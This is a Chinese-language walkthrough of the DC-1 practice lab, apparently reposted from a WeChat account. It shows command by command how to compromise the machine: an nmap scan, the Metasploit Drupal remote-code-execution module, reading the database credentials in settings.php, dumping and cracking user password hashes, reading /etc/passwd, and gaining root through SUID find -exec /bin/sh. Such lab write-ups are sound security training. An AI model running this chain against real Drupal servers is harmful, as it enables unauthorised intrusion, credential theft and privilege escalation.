首先进行准备工作:
装好DC-1(网络适配器设置为nat) IP:192.168.2.133
打开kali机 IP:192.168.2.132
利用nmap进行扫描IP段存活主机 命令为:
nmap -sS 192.168.2.132/24
扫描结果如下:
可以看到存活一台主机,且开启了ssh,http,rpcbind服务
首先判断,ssh服务是否可爆破,http则直接访问web页面
访问web页面:
收集信息:
1.登录框是否为弱口令,sql注入,没有验证码爆破
2.Drupal 很明显是cms,收集该cms版本查看已经存在的漏洞
3.寻找该web站所使用语言,中间件,操作系统等
4.敏感目录,比如robots,git,syn这类
分析后开始实践
通过wappalyzer
再万能百度
发现9.x版本以下存在远程代码执行的漏洞
打开msf搜索drupal模块
msfconsole
use drupal
use 1
show options
set rhosts 192.168.2.133
run
此时已经拿到权限,进入shell模式查看当前权限
首先查看目录文件
这里可以看到flag1.txt在文件中,打开提示
Every good CMS needs a config file - and so do you.br
大概意思就是需要配置文件
继续百度
利用find搜索配置文件
find / -name setting.php
打开该配置文件
flag2得出,
暴力和字典攻击不是获得访问权限的唯一方法(您将需要访问权限)你能用这些凭据做什么?
这里提示大概是不用爆破,有了数据库账号密码直接连接即可
这里提前需要一条命令
python -c 'import pty; pty.spawn("/bin/bash")'
转为交互式shell
mysql -u dbuser -p
R0ck3t
show databases;
use drupaldb
show tables;
select * from users;
放入cmd5解密
admin 53cr3t
Fred MyPassword
得出flag3.txt:
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
特殊的PERMS将帮助查找密码,但您需要执行该命令才能找到阴影中的内容。
密码,阴影,执行=/etc/passwd
cat /etc/passwd
果然flag4在,根据这个可以知道flag4在home目录下
cd /home/flag4
ls
cat flag4.txt
你能用同样的方法在根目录中查找或访问标志吗?可能但也许这并没有那么容易。或者可能是这样?
很明显这里需要提取权限,在root情况下相同的方法得到flag,先确认下权限
思考前面拿取第二个flag的时候是用find,则可以尝试利用find提权
find / -name flag4.txt -exec "whoami" ;
find / -name flag4.txt -exec "/bin/sh" ;
cd /root
ls
注意 /bin/sh来源于
这里尝试cd root目录失败 ,是由/bin/sh这个脚本文件控制,所以给/bin/sh提权然后切换root
到此靶场就通关啦!!
原文始发于微信公众号(shadowsec):DC-1实战演练
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论